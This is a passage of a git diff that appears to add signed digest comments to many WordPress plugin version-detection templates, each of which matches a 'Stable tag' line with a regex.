b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..93e0f7df22 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220139d42f1e0488ac0e9b2c9e323797f482a04f273d3b3b2365dfc2c10809cd0bc0221008293dfddbaa2b9498e7f09e71fb819e0637b12894627f12fc074177fabeca16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..2edff28251 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220365930383966ec4c052420f1c4b6b2e531f811031a575670cadf1396e3731cd002206bb20f63d74696ca83e7cd18ea0616ccc82dd1171263c407cd8458186f648508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..d67b9beaec 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b69bd27bda888f4a663b8142b07747fb9c4586e05d4cd09bfb5c8aab3bd1469a022039f73fbecea517b0dabb9944f0f51d29011f87d01d121345427740ff220f5477:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..c0958416ff 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075bb08a827a4a3225f849f711c41d49036a2893eca7e6001788495e1abb42514022100e0a1c58322075a2d89e8bf2c26b27eddbf4af275cc4096997a2da34ffede8168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..e174650f2d 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204ee8825d5f290395c9d49a8a563081df3dd1117b74c7b1a3bd01bbfc7fcbd6bb02205e82a1b808842ba0637c605980b010a14bde98047593e25789e49760d0993598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..fff72f052e 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200d6ffe6b42a5376b64cdd1f35769a88bdcddeec0a3b623a67178ca2d1aeccc6802201bc2387471baa0abb7c09db01dfc9766e5190e8b726eb9128dc6dd0f328e191d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..cd8160b065 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210081db43b7f99ad42c1e7a49f85304a85aab86bf57b1a32516d85a9d7ea939c4d102204df02e815d5919166ca748b3db13dc75eeabcf042a1ffdcbc7f7bd9c32891cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..cc98ff1c0e 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010f258cd24f4cb7aa543f5668ae85b1938e8acf2779a0552de946bd7f4fc81360221009e357800080ef343d66d35657c89652bff30c792b229b85009d42a027d02c61b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..9f6310ea57 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204fee5144359e20e951c8b13b674c1a5cdaa71dfcd7cd08df30fc4ae510ca0374022100cde95a6191aca0b414ebe2cf6cb8c705f9b9abb1f4cf5624c3338bbc01c13355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..c700ee1778 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210097335284eb3012e5f6206e69888a6a8b5db82e06acb656bf8a18e810acf108d502206f22b1ac46d057116d15c75bcbea6bf0c9e706d944b7e6a7a8125c23c304ae64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..8deafe5213 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b83c10f29087616d9a4f8aa3cb667d88c2b469e816a43eb5c60f845eebe7ad4022014ad663aaf89acccb53185fcc732846165d857ec61a2997d8ee3add27d8a53bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..252022c6cc 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203dbecdd76d7c094f2d7a2a1619bfb717778a55c79d0e7ff1310b2ce15ad55b1f022045903b8a6f20de7c9abd0fe1e9cc20c5ee0132303296dd71db2b3f3c583f524f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..8bd86eb2af 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ddd68b68e58e0bbbdc6e24489fb9fa705434a680f036e73e939dee004068d8110221008904a6b10ca3bbc2356ca2d2fb5b124ef655a12d1592ff1699e3aa4bcad2ebd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..51fce282f3 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202bf422f19932a484417816f1f8540ddec428fc81396b6236262b619368b73de1022100c64dbc9926a6c7b89c0f9a451da0bbc867243d83605e04f6f3c35232d1612f09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..96ea6f587e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f96f027f17ebbaafef816a808df98a39ce50010afbf25fa623985230150873d02210098bc8243d54d9921a8c9755968ffb92fc8fc38f103555bab26d50bf9540387de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..bb037f69ee 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cbbfe4df2568873757b669ee86b436dd73b5fccdc63fdf7d99ad8d684f597a36022100ad415d006d2094617b245c6fce977875326a112881a96fa4571172a8633047f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..3a6d90a8c8 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd71374326bf72aac32b7983c4af7e9831cb21bbbf2204fe7b3318456f47b4ef022100ced469f62d63c321d1144c4a64d2f6e993b836a465384d45116751e1a39182c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..47646c37d4 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e84f14015696138e680af01af58983b59ce58313eee8497ffa33a2fe9540ae4202206c337dd2edc13af16423242e22e3ca7754c2034f5ea77f3d555d25b6ae67ef66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..1d6f7b1810 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220528db20db3b7d5bc64754e18a687c3a2ca029643693b3efa78069773c3b99d5f022100f4775c71bd6539a25a24dd75f920569c3f8c6a59ef86f160d685390d2c0829c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..f37d683e43 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206aea12238f63be5fb9b25b577f21ae7c85f5cbe9afe21e901202ba6f07b63826022052c135924a6adbcd7073ceec2a85688a1a8ac21f9a5f769ebe9c8d3c322d2724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..bd56095403 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f524d3e97cabc9f493f9c6e85929f0e5e104d666e2a93b3f1047d70d55ba58f02202c998e4c10977b826cc64f860b0d4756b41b0f3cbd81df2289c7123fafa037e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..37c053ec1a 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073490cc399f8dc4e7f05a92cec811daddacb5c430e07448ef0dcaca8175117df022045e13708000826724c90bcf11f5e6e701716fde43ef2b8a14316375cd3223121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..dca42757ac 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a41682c2d8b17da98ae0ae6e3f27898c4c668f3979d6fe47436622d7a1f8323902204eafb246bce6aa68dbd3aff7d5fee3770cae9daa8a179b1c4a23628d1917442b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..235a7dbff8 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207b48d0c2ea277b890f5dd49e707572be076eccc4054725e794f5706abeca2ca502207e9989e86f67d27dbaa8946909fd69d0f41d1bb6264da5de2f9a113cf744b39b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..43ed59d408 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206c94289fe43114d7d3c099346aa8c8a8edf2791cbf9f47b9b9a08ab11b9fd1c30221008db36943e35c21bc7d9f8761799520716643ea860c1ccbe3f87b1db2d78678b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..5d5f1326dd 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ac6f6a459012aa62907ec4529bc6d2d65576092906ed878124122f15302a49902206c9229ca73f67eb69284d0794608355fe9de3f737b9d2bbbbfd73a5f14c11355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..5b72918e85 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a41cac3802ea8b8242ed684465ac63f130f795c27aa0ff40adea848214ac3102022100ee2c10322539a2bcd1380e88b81e8eef1340b2cf85e3ed3d7b0a8de2ed5240f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..1e49d5e101 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a082954a8ebfde841623554e9e499f2f7388f267f632c0bd92a402743958977022100c225fb25941ef5811fb483887e80e1add21f4cf1d4327eddf8d368423b686edf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..fb6ca905b4 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100abf344c7405b5bf33e68d9ba009f0740a8856d5319137995a55fbd9906210a7a0220511c66b89e042a88c1412d89dc30f7c2268dd66b5f00b6a610f1a694a2afdc20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..c59c7aa56b 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b55f0896ce4369849609d509f4bf62d9735e2a4d18752ea400a9463edda135a022100903ad4f2a453c8fea138a0328fc043f8396a0944790768ef82562a04a3d2951f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..c9398cfa0b 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b8c2dffd8971a0db49238542ba008e0dda3518901670d9e3e3a7e36ac7a49c8d022100d5aa65385d7cffeff420e9a2c112f1b64f40977bb4fbf90ed999e9e79f42bf82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..c0a31e9187 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100938111d19b72e46fc00509046baf6b2d36cf0a2ad961916db24db877001cdafe02206082ec7480e8dedae7cb30324eacb32eaca5f6804cfc908f7803394580f15f59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..ea0acd46f0 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a209536d1c9be1e284af5acb6d3e611146fd3c01c116b6da9506234783ea6ac02204ac2a141dbc139c3c99eabfe5eaa3e7c99ff20166d4344f2040ec4cd9b872e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..937fede554 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040ee9df92b041d50fd4f293eafe85bf3b3185d0fb29794bc35b88edff1d2f2d7022100addf13d4f904351be71d74c87d8f6edec85cbe2f76de8d1035f500a0bc2376f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..1bb587dd53 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008894e5f82c5003e31774260c43d227c579220e1f9f33496cfa0462061103cba4022043af003ca6352de28200611a95e2230c6fb8f48a1f8d3ce1f1f230b62ece275f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..9480758bb4 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220620cbaf64a6dfbbaa100a7be738062c8fe1dbb3e3244937a89984850384c648a02210088f9f877a6c905686c6ed7a7ca8cd8beef6960f93acae6149dc00bc4dd61bbd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..bdc9fc95ad 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057dddc6afbafe94a8088c5db503b672754004ce61c0fe999b0128911c96ae4b102201cae6f2813935a1407d38694afd6a736b433bf856f97f7f10b72c63028848529:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..f7dd7def57 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210091db942690714751a7f99ffabbf449ff11bc10980e0865a4bd48a72549b3e4bd022100fa04b0f0defd796a7bcef828738c59824b3993979c227c881ec92f37c37b770c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..688825e47b 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089ca6106e6f90b75fac70cb5b5c4d6ad66623d86f1464be925f3bb92a034e7e502200fddd71eeb07db2b74ee24be5165f2497d0660895e03ddc98e25319fe7449933:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..b4a0eb09ff 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220546562107e40606a068e5509668ac6777159661e7afb6f78285aba4e5873ea9302204e194ccb538c6ef3fdeed5e5020c47a4daf795e68171cb3edae124859bdf92fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..54ae9fa759 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b2ff0d18062c142ff17907c66848443d58786b6b3be720dbed2a4d72fa676410022100b04d81e1be5101d72baab254855f305b92ed68e4d3e3761e35534a8a7a3e8ba5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..0b15170082 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205c72c973e85bf9397cc00f78e60603094e5944ae42e548a8ac288ed4f93eb1e20220621fe3b1ac0b09cb26cc778c1ab7503db5528d1a7c0713f7b02f60692705e7ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..981d185157 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e25186ab5f4c48b3f49486b40fe75d7459901cd8fd00d6356473d301f65288e50220365a2489f98ad175a87b96db08dcffc9a0c5847f41eeacae9312e741f8440c98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..2fb82499a7 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b49e6565c02278bb31edb6090548d31ce747f4ba472500fc05ef09e89d454947022100ef2ede4bc89c9cd0a1e254ac92618d6ae42efb33c5a6d02b7db7195b8d14830b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..69fd424cfc 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049588d31c8db480058fe3558fc40b52bc3210222c9163c635fb39ec1843f6d310221008c9b0cc77fa22daac3c75ac75f1a4aa66fdabeb178758072627fe336a9b0e58b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..f7ef8aac26 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009055f800aca5bfe2aab503ffee886684cf3f5be895c2c5087efcdd99ae2a7cc8022100d118a8c36d909b6d3025805af315b46eea0f74709add4259bee29ed8a1edd65c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..b24d2250b0 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202652fcbb3827fafaaffea3010095f08345c071f196afdf417b47db5a3a2bb1b60221009e66044a00540b2041238b2673bed98f7909c9e3b1a03d6188655362e3074f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 